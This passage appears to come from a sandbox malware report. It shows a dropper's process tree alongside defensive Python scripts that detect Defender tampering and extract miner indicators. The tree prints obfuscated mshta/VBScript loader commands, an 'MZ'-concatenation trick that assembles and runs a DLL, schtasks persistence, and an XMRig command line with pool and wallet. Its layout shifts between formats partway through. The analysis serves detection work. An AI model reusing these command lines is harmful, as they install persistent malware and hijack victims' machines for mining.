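        for tid, action in threat_overrides(inner):
            if action == "Allow":               # detection's default action set to Allow
                findings.append(("defender_threat_allow", str(tid)))
        pol = defender_policy_write(inner)
        if pol:
            findings.append(("defender_policy_write", "%s\\%s=%s" % pol))
        task = scheduled_task(inner)
        if task:
            findings.append(("scheduled_task", task[0]))
        decoded = decode_encoded_command(inner)
        if decoded is not None:
            findings.append(("encoded_powershell", decoded))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_CMDLINES):
        print("%-22s %s" % (rule, detail))
```

On a live host the same facts can be confirmed with Get-MpPreference (ThreatIDDefaultAction_Ids and _Actions) and by reading the two policy keys; an "exe" entry under Exclusions\Extensions or SpyNetReporting=0 set by anything other than your own management tooling is tampering.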
[depth 6] C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe
    "C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe
    "C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe"
    - Executes dropped EXE

[depth 7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 236
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 6] C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe
    "C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe"

[depth 6] C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe
    "C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[depth 7] C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe
    "C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

[depth 6] C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe
    "C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe
    "C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 6] C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe
    "C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe"
    - Executes dropped EXE

[depth 7] C:\Users\Admin\AppData\Roaming\1482356.scr
    "C:\Users\Admin\AppData\Roaming\1482356.scr" /S

[depth 7] C:\Users\Admin\AppData\Roaming\3689896.scr
    "C:\Users\Admin\AppData\Roaming\3689896.scr" /S
    - Suspicious behavior: SetClipboardViewer

[depth 7] C:\Users\Admin\AppData\Roaming\3027623.scr
    "C:\Users\Admin\AppData\Roaming\3027623.scr" /S
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\AppData\Roaming\1361734.scr
    "C:\Users\Admin\AppData\Roaming\1361734.scr" /S
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\AppData\Roaming\3481701.scr
    "C:\Users\Admin\AppData\Roaming\3481701.scr" /S

[depth 4] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
    - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10b0a06a73706.exe
    Fri10b0a06a73706.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 6] C:\Users\Admin\AppData\Roaming\1223505.scr
    "C:\Users\Admin\AppData\Roaming\1223505.scr" /S
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 6] C:\Users\Admin\AppData\Roaming\8752590.scr
    "C:\Users\Admin\AppData\Roaming\8752590.scr" /S
    - Executes dropped EXE
    - Adds Run key to start application

[depth 7] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    - Executes dropped EXE

[depth 6] C:\Users\Admin\AppData\Roaming\1258873.scr
    "C:\Users\Admin\AppData\Roaming\1258873.scr" /S
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\AppData\Roaming\4051319.scr
    "C:\Users\Admin\AppData\Roaming\4051319.scr" /S
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\AppData\Roaming\7375211.scr
    "C:\Users\Admin\AppData\Roaming\7375211.scr" /S
    - Executes dropped EXE
    - Loads dropped DLL

[depth 7] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\7375211.scr"

[depth 8] C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    - Delays execution with timeout.exe

[depth 6] C:\Users\Admin\AppData\Roaming\3144856.scr
    "C:\Users\Admin\AppData\Roaming\3144856.scr" /S
    - Executes dropped EXE

[depth 4] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
    - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1015b9a4e0b.exe
    Fri1015b9a4e0b.exe
    - Executes dropped EXE

[depth 6] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 292
    - Program crash
    - Enumerates system info in registry

[depth 4] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
    - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1008c7d6874.exe
    Fri1008c7d6874.exe
    - Executes dropped EXE

[depth 4] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
    - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri103a7805577.exe
    Fri103a7805577.exe
    - Executes dropped EXE

[depth 6] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

[depth 7] C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

[depth 8] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

[depth 9] C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
    - Creates scheduled task(s)

[depth 8] C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    - Suspicious use of SetThreadContext

[depth 9] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

[depth 10] C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
    - Creates scheduled task(s)

[depth 9] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

[depth 9] C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
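The explorer.exe entry at depth 9 is not Explorer: its arguments are an XMRig command line (pool --url, --user wallet, --algo=rx/0, --tls, CPU thread hints) carried into a system binary by services64.exe, which is consistent with process hollowing given the SetThreadContext signature on that parent. The --cinit-* switches are not stock XMRig options and are the fingerprint of the wrapper that built this binary. The script below is an added example, not part of the Triage report and not code from the sample: it tokenizes that command line, extracts the pool, wallet, worker and TLS setting, checks that the wallet has the shape of a Monero address, lists the non-stock switches, and flags the mismatch between the image name and the argument set. The stock-option list, the image names a non-masqueraded build would carry, and the wallet.worker/contact split of --user (nanopool's pool-side convention) are the author's assumptions.

```python
"""Extract miner IOCs from the XMRig command line that runs inside explorer.exe.

Added example; not part of the Triage report and not code from the sample.
SAMPLE_CMD is the explorer.exe command line from the tree above. XMRIG_OPTIONS
(stock XMRig long options that occur here), MINER_IMAGES (names a
non-masqueraded build would carry) and the wallet.worker/contact split of
--user (nanopool's pool-side convention) are the author's assumptions.
"""
import re

SAMPLE_CMD = (
    "C:\\Windows\\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto "
    "--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 "
    "--cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 "
    "--user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password "
    "--pass= --cpu-max-threads-hint=30 "
    '--cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" '
    "--cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth"
)

XMRIG_OPTIONS = {"url", "user", "pass", "algo", "asm", "tls", "cpu-memory-pool",
                 "randomx-mode", "randomx-no-rdmsr", "cuda-bfactor-hint",
                 "cuda-bsleep-hint", "cpu-max-threads-hint"}
MINER_IMAGES = {"xmrig.exe", "xmrig-notls.exe"}   # assumption: honest miner image names

# Whitespace-separated tokens, keeping "quoted values" together.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
# Monero standard address (4...) or subaddress (8...): 95 base58 characters.
XMR_ADDR_RE = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")


def parse_args(cmdline):
    """Split a command line into (image, {option: value}); handles --k=v, --k and -X."""
    toks = TOKEN_RE.findall(cmdline)
    image, opts = toks[0], {}
    for tok in toks[1:]:
        if tok.startswith("--"):
            key, eq, val = tok[2:].partition("=")
            opts[key] = val.strip('"') if eq else True
        elif tok.startswith("-"):
            opts[tok[1:]] = True          # short switch, e.g. -B (run in background)
    return image, opts


def is_monero_address(s):
    return bool(XMR_ADDR_RE.fullmatch(s))


def extract_miner_iocs(cmdline):
    """Return a dict of IOCs, or None when the line carries no pool --url."""
    image, opts = parse_args(cmdline)
    if "url" not in opts:
        return None
    url = re.sub(r"^[a-z+]+://", "", str(opts["url"]))   # drop stratum+tcp:// etc.
    host, _, port = url.rpartition(":")
    wallet, _, rest = str(opts.get("user", "")).partition(".")
    worker, _, contact = rest.partition("/")
    basename = image.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return {
        "image": image,
        "pool_host": host or url,
        "pool_port": int(port) if port.isdigit() else None,
        "tls": opts.get("tls") is True,
        "algo": opts.get("algo"),
        "wallet": wallet,
        "wallet_is_monero": is_monero_address(wallet),
        "worker": worker,
        "contact": contact,
        "cpu_max_threads_hint": opts.get("cpu-max-threads-hint"),
        # switches no stock XMRig build accepts: fingerprint of the builder/wrapper
        "nonstock_switches": sorted(k for k in opts if len(k) > 1 and k not in XMRIG_OPTIONS),
        # miner arguments under a system binary's name: the image was replaced in memory
        "masquerading": basename not in MINER_IMAGES,
    }


if __name__ == "__main__":
    for key, value in extract_miner_iocs(SAMPLE_CMD).items():
        print("%-22s %s" % (key, value))
```

The wallet and pool host are the durable indicators here; the task name services64 and the paths under AppData\Roaming are what the builder chose for this campaign and change between builds.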
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5865939.scr"C:\Users\Admin\AppData\Roaming\5865939.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1696741.scr"C:\Users\Admin\AppData\Roaming\1696741.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4726559.scr"C:\Users\Admin\AppData\Roaming\4726559.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7424173.scr"C:\Users\Admin\AppData\Roaming\7424173.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6037216.scr"C:\Users\Admin\AppData\Roaming\6037216.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 3488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 5968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 7808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
        [depth 8] C:\Windows\SysWOW64\mshta.exe
            Command line: "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
          [depth 9] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
            [depth 10] C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill -f /Im "sfx_123_206.exe"
                - Kills process with taskkill
            [depth 10] C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                Command line: ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
              [depth 11] C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
                [depth 12] C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
              [depth 11] C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
                [depth 12] C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                  [depth 13] C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                  [depth 13] C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                  [depth 13] C:\Windows\SysWOW64\control.exe
                      Command line: control ..\kZ_AmsXL.6G
                    [depth 14] C:\Windows\SysWOW64\rundll32.exe
                        Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                        - Loads dropped DLL
                      [depth 15] C:\Windows\system32\RunDll32.exe
                          Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                        [depth 16] C:\Windows\SysWOW64\rundll32.exe
                            Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                            - Loads dropped DLL
      [depth 7] C:\Users\Admin\AppData\Local\Temp\setup_2.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
          - Executes dropped EXE
        [depth 8] C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp
            Command line: "C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp" /SL5="$202C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
            - Executes dropped EXE
            - Loads dropped DLL
          [depth 9] C:\Users\Admin\AppData\Local\Temp\setup_2.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
              - Executes dropped EXE
            [depth 10] C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp" /SL5="$20292,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                - Loads dropped DLL
                - Suspicious use of FindShellTrayWindow
              [depth 11] C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe" ss1
      [depth 7] C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
          - Executes dropped EXE
      [depth 7] C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"
[depth 4] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
  [depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri105268dda3.exe
      Command line: Fri105268dda3.exe
      - Executes dropped EXE
    [depth 6] C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 244
        - Program crash
        - Enumerates system info in registry
[depth 4] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
  [depth 5] C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exe
      Command line: Fri10fcc13ae0125c8.exe
      - Executes dropped EXE
    [depth 6] C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp
        Command line: "C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201EC,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exe"
        - Executes dropped EXE
        - Loads dropped DLL
      [depth 7] C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe" /S /UID=burnerch2
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Adds Run key to start application
          - Drops file in Program Files directory
        [depth 8] C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe
            Command line: "C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT
          [depth 9] C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp" /SL5="$402D8,281924,62464,C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT
              - Drops file in Program Files directory
              - Suspicious use of FindShellTrayWindow
            [depth 10] C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                Command line: "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                - Checks processor information in registry
                - Enumerates system info in registry
        [depth 8] C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe"
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              - Adds Run key to start application
              - Enumerates system info in registry
              - Suspicious use of FindShellTrayWindow
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
